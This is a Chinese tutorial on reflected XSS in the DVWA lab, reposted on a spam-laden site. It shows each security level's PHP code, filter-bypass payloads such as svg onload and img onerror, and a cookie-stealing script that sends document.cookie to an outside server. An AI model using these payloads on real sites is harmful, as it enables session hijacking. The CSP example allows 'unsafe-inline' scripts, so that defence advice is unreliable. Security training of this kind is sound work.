当前位置: 首页 > wzjs >正文

网站设计公司的推广国际免费b站

网站设计公司的推广,国际免费b站,上海建设安全生产协会网站,如何拥有自己的网站域名目录 一、环境搭建与漏洞原理 1.1 反射型XSS原理 二、Low安全级别漏洞分析 2.1 漏洞代码分析 2.2 利用方式 三、Medium/High安全级别绕过 3.1 Medium级别防护分析 3.2 High级别防护分析 3.3 各级别防护对比 四、Impossible级别与防御方案 4.1 Impossible级别实现 4.…

目录

一、环境搭建与漏洞原理

1.1 反射型XSS原理

二、Low安全级别漏洞分析

2.1 漏洞代码分析

2.2 利用方式

三、Medium/High安全级别绕过

3.1 Medium级别防护分析

3.2 High级别防护分析

3.3 各级别防护对比

四、Impossible级别与防御方案

4.1 Impossible级别实现

4.2 企业级防御方案

一、环境搭建与漏洞原理

1.1 反射型XSS原理

反射型XSS(Reflected XSS)特点:

  • 恶意脚本通过URL参数注入

  • 服务端未过滤直接嵌入到响应中

  • 需要诱导用户点击特定链接触发

  • 攻击效果是一次性的

漏洞产生流程:

攻击者构造URL → 用户点击 → 服务器返回含恶意脚本的页面 → 浏览器执行脚本

二、Low安全级别漏洞分析

2.1 漏洞代码分析

<?php
header("X-XSS-Protection: 0");
if(array_key_exists("name", $_GET) && $_GET['name'] != NULL){echo '<pre>Hello ' . $_GET['name'] . '</pre>';
}
?>

漏洞点:直接输出用户输入,无任何过滤

2.2 利用方式

基础Payload:

http://192.168.21.4/dvwa/vulnerabilities/xss_r/?name=<script>alert(document.cookie)</script>

高级利用(窃取Cookie):

<script>
new Image().src="http://192.168.21.1/steal.php?cookie="+encodeURIComponent(document.cookie);
</script>

192.168.21.1服务器上收到cookie的值

图2.1 成功执行任意JavaScript代码

三、Medium/High安全级别绕过

3.1 Medium级别防护分析

关键代码:

<?php
​
header ("X-XSS-Protection: 0");
​
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Get input$name = str_replace( '<script>', '', $_GET[ 'name' ] );
​// Feedback for end user$html .= "<pre>Hello {$name}</pre>";
}
​
?>

发现进行了<script>过滤

绕过方法

  1. 大小写混淆:<ScRiPt>alert(1)</ScRiPt>

  2. 嵌套标签:<scr<script>ipt>alert(1)</script>

  3. 使用非script标签:<img src=x onerror=alert(1)>

3.2 High级别防护分析

关键代码:

<?php
​
header ("X-XSS-Protection: 0");
​
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Get input$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
​// Feedback for end user$html .= "<pre>Hello {$name}</pre>";
}
​
?>
 

防护原理:使用正则表达式匹配并删除<script>标签及其变体

  • <(.*):匹配<后跟任意字符(包括无字符)

  • s(.)c(.)...:强制按顺序匹配s、c、r、i、p、t字母

  • /i:不区分大小写

绕过方法

  1. SVG标签:<svg/onload=alert(1)>

  2. 事件属性:<body onpageshow=alert(1)>

  3. 伪协议:<a href="javascript:alert(1)">click</a>

3.3 各级别防护对比

安全级别防护措施有效Payload示例
Low无过滤<script>alert(1)</script>
Medium移除<script>字符串<img src=x onerror=alert(1)>
High正则过滤script标签<svg/onload=alert(document.domain)>
Impossiblehtmlspecialchars转义无有效绕过方式

四、Impossible级别与防御方案

4.1 Impossible级别实现

<?php
​
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
​// Get input$name = htmlspecialchars( $_GET[ 'name' ] );
​// Feedback for end user$html .= "<pre>Hello {$name}</pre>";
}
​
// Generate Anti-CSRF token
generateSessionToken();
​
?>

htmlspecialchars防护原理

  • 将特殊字符转换为HTML实体

  • 例如:<&lt;"&quot;

4.2 企业级防御方案

  1. 输入验证(白名单原则):

    if(!preg_match('/^[a-zA-Z0-9]+$/', $input)){die("Invalid input");
    }

  2. 输出编码

    // HTML上下文
    htmlspecialchars($str, ENT_QUOTES, 'UTF-8');
    ​
    // JavaScript上下文
    json_encode($str, JSON_HEX_TAG);

  3. 内容安全策略(CSP)

    Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline'

    内容安全策略(CSP)详解:Web安全的关键防线-CSDN博客

  4. 现代前端框架防护

    • React/Vue/Angular默认自动转义

http://www.dtcms.com/wzjs/444257.html

相关文章:

  • 做暧嗳xo小视频网站金泉网做网站多少钱
  • 运城市做网站惠州seo博客
  • 一个小程序开发费用国外seo
  • 网站建设项目管理基本要求深圳网络营销推广公司
  • 微网站建设及微信推广方案怎么在百度发布自己的文章
  • 重庆网站运营怎么让网站快速收录
  • 网站空间到期了怎么办技术培训班
  • 江苏专业的网站建设长沙优化网站哪家公司好
  • 黑龙江省建设银行网站2021百度最新收录方法
  • 怎么做织梦网站怎么在百度上做推广上首页
  • jsp网站开发源码搭建网站的软件
  • 进入山东省住房和城乡建设厅网站网站推广服务报价表
  • 北京学习网站建设sem优化
  • 杭州模板建站定制网站网站seo排名优化价格
  • 只做健康产品的网站百度指数介绍
  • 郑州网站排名优化潍坊网站外包
  • 大型网站建设设备域名seo站长工具
  • 邯郸wap网站制作国外免费网站域名服务器查询
  • 专业网站建设制作网站优化关键词排名公司
  • 海口企业网站建设网站优化排名软件
  • 哪个网站有淘宝做图的素材百度认证号码平台
  • 创建网站建设河南关键词优化搜索
  • 上海人才招聘网站品牌seo是什么
  • 怎样下载免费的ppt模板seo简单优化操作步骤
  • 公司做网站用什么主机免费外链发布平台在线
  • 手机进入网站自动识别百度指数爬虫
  • 广西两学一做考试网站广州seo网站开发
  • 没有网站怎么做链接视频教程seo销售代表招聘
  • 网站app封装怎么做制作一个简单的html网页
  • html5 网站开发电商项目策划书